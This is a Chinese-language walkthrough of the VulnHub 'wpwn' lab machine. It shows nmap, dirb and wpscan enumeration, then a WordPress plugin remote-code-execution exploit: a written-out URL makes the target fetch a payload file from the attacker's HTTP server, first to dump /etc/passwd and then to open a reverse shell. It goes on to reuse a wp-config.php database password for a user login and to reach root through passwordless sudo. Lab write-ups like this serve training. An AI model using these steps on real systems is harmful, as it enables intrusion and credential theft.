当前位置: 首页 > wzjs >正文

昆明室内设计学校seo搜狗

昆明室内设计学校,seo搜狗,php做的网站怎么入侵,做b2b网站销售怎样让客户找上门文章目录 1. 主机发现2. 端口扫描&服务枚举3. 服务探查4. 系统提权 靶机地址:https://download.vulnhub.com/wpwn/wpwnvm.zip 1. 主机发现 目前只知道目标靶机在192.168.37.xx网段,通过如下的命令,看看这个网段上在线的主机。 $ nmap -…

文章目录

  • 1. 主机发现
  • 2. 端口扫描&服务枚举
  • 3. 服务探查
  • 4. 系统提权

靶机地址:https://download.vulnhub.com/wpwn/wpwnvm.zip


1. 主机发现

目前只知道目标靶机在192.168.37.xx网段,通过如下的命令,看看这个网段上在线的主机。

$ nmap -sP 192.168.37.0/24

在这里插入图片描述
基于已有的IP排除一下,目标靶机的IP地址锁定为192.168.37.134。

2. 端口扫描&服务枚举

通过下面的命令扫描一下端口。

$ sudo nmap -p- 192.168.37.134

在这里插入图片描述
嗯,还是只有22端口和80端口,枚举一下端口上的服务。

$ sudo nmap -p22,80 -A -sT -sV 192.168.37.134

在这里插入图片描述
又是apache,并且扫做系统应该是debian。

3. 服务探查

直接浏览器访问一下。
在这里插入图片描述
就是一段普通的文字,不需要过度解读,直接扫描一下目录。
在这里插入图片描述
先看看robots.txt文件。
在这里插入图片描述
没啥特别的内容,/secret打不开,不过这个ma和boi可能是用户名。另外,又是worpress,先挂上big字典扫描一下php和html页面,然后用wpscan扫一下。

$ dirb http://192.168.37.134 /usr/share/wordlists/dirb/big.txt -X .php
$ dirb http://192.168.37.134 /usr/share/wordlists/dirb/big.txt -X .html
$ dirb http://192.168.37.134/wordpress/ /usr/share/wordlists/dirb/big.txt -X .php
$ dirb http://192.168.37.134/wordpress/ /usr/share/wordlists/dirb/big.txt -X .html

在这里插入图片描述
除了wp下的php,没啥干货,wpscan扫描一下吧。

$ wpscan --url http://192.168.37.134/wordpress -e u

在这里插入图片描述
枚举除了wp的版本为5.5,并且存在一个账号admin,这从/wordpress首页的HelloWorld作者也可以看出来。另外,在访问浏览器前面扫描出来的php页面的时候,发现浏览器访问很慢,很多页面元素都指向了192.168.1.12的主机,如下图所示。
在这里插入图片描述
这是一个比较奇怪的地址,在kali和我的windows host上都可以ping通这个地址。应该是靶机里面又起了虚拟机。所以我们在这个地址上也扫描一下。
在这里插入图片描述
很奇怪,这个地址能够ping通,扫描的时候全部超时。直接枚举一下这个地址上的端口和服务试试看。
在这里插入图片描述
浏览器里面手工访问一下看看。
在这里插入图片描述
手工访问不可达,暂时放一边。另外在wpscan里面海扫描到一个插件,如下图所示
在这里插入图片描述
直接根据插件名称和版本看看有没有可以利用的漏洞。
在这里插入图片描述
有个远程代码执行漏洞,并且跟我们扫描出来的插件版本是匹配的,下载exp看一下。
在这里插入图片描述
代码不是很复杂,但是具体怎么用,没说,还在自己组装payload,太麻烦了,直接上网上找一下。大致意思是,在本地创建一个txt文件,里面装载具体的可执行代码,然后在本地起一个http服务,让靶机可以远程访问到这个文件,就可以远程执行txt中的代码了。既然这样,我们先构造一个payload文件,名为my_payload.txt,如下图。
在这里插入图片描述
然后本地用python起一个http服务。

$ python3 -m http.server 5000

手工在浏览器中访问一下对应的url。

http://192.168.37.134/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.37.132:5000/my_payload.txt

在这里插入图片描述
如上图所示,页面顺利返回了我们请求的/etc/passwd的内容,并且http服务有请求过来的反应,这说明是靠谱的.
在这里插入图片描述
将payload中的内容改成反弹shell,如下图。
在这里插入图片描述
重新启动一下http服务(不重启的话,修改后的payload可能不生效),本地建立监听。然后重新在浏览器里面访问一下。

在这里插入图片描述
顺利创建反弹shell。

4. 系统提权

先通过python优化一下shell。

www-data@wpwn:/var/www/html/wordpress/wp-admin$ /usr/bin/python3.7 -c "import pty; pty.spawn('/bin/bash')"

在这里插入图片描述
看一下系统信息。
在这里插入图片描述
64位的debian10,内核版本也出来了。接着运行一下linpeas脚本。
首先是一个内核提权漏洞,不过比我们靶机的内核版本低不少,暂时放弃,如下图。
在这里插入图片描述
另外,找到了另外一个用户takis,如下图。
在这里插入图片描述
顺便从passwd中看看还有没有别的用户。

$ cat /etc/passwd | grep "/bin/bash"

在这里插入图片描述
确实没有别的用户。接下来,有个有意思的信息,如下图。
在这里插入图片描述
意思是,任何其它的用户,可能没有密码或者用户名作为密码?直接试试我们刚找到的takis用户吧。
在这里插入图片描述
看来想简单了,不可以。再往下,在wp-config.php中发现了数据库的用户名密码。
在这里插入图片描述
既然takis是貌似除了root之外唯一靠谱的用户,看看这个密码能不能登录takis吧。
在这里插入图片描述
有点超乎想象,真的能够登录成功,于是我们得到了takis用户的近似于变态的密码R3&]vzhHmMn9,:-5 ,这个密码通过爆破获得肯定是不可能了,顺拿下当前用户的flag。
在这里插入图片描述
直接在takis用户下执行一下linpeas脚本。
在这里插入图片描述
首先发现的是上图所示的,难道takis运行啥都不需要password吗?直接sudo bash一下。
在这里插入图片描述
额,这就提权成功了。验证一下,并获取一下flag。
在这里插入图片描述
确实是root用户,提权成功,不过这里本应该放置flag的root.txt里面只放了一句话,正好应对了首页当中显示的那句话,还有印象吗?再贴过来一遍。
在这里插入图片描述
我们的目标不仅仅是提权到root shell,而是读一下哈这个文件。看看他这个USB吧。
首先通过ls -lah在/mnt和/dev下面都没有发现特殊的(其实是我不太懂),不过这里提到了USB,直接全盘搜索吧。

root@wpwn:~# find / -name "USB"

在这里插入图片描述
有发现,看看里面是啥。
在这里插入图片描述
顺利拿到flag,游戏结束。

http://www.dtcms.com/wzjs/107630.html

相关文章:

  • php做网站架构图优化大师免费下载安装
  • 企业做淘宝网站需要多少钱深圳网络公司推广
  • 全国工商企业查询系统官网seo入门书籍
  • 做个外贸网站一般需要多少钱做外贸怎么推广
  • 电子商务网站建设的基本过程seo网站优化公司
  • 盐城做网站大连头条热点新闻
  • 网站建设三个阶段品牌运营推广方案
  • 营销网站优化seo太原网络推广价格
  • 开发网站监控推荐如何免费制作网站
  • 最权威的品牌排行榜网站zoho crm
  • 找人做软件去哪个网站找百度爱采购服务商查询
  • 长沙做网站湖南微联讯点不错模板网站建设
  • 天津做网站推广的网站安徽新站优化
  • 椒江做国际网站的公司seo关键字优化
  • 大连能做网站的公司有百度权重查询工具
  • 关于音乐的个人网站seo搜索引擎实战详解
  • 精品网站制作搜索引擎优化中的步骤包括
  • 做愛黄色视频网站福利南昌百度seo
  • 58同城日照网站建设百度世界排名
  • 网站维护 费用百度不让访问危险网站怎么办
  • 射阳做企业网站多少钱营业推广方案怎么写
  • 24小时看b站直播的软件网站交换链接的常见形式
  • 如何给网站做真实搜索点击重庆seo1
  • 北京最大网站建设公司排名宁波网站推广公司报价
  • 做网站书竞价托管外包费用
  • 杭州的设计网站哪个平台推广效果好
  • 营销型网站设计论文近期新闻热点
  • 莱芜车管所网站手机app推广平台
  • 开发网站服务器百度直播推广
  • 一般的网站都是用什么系统做的泉州seo代理计费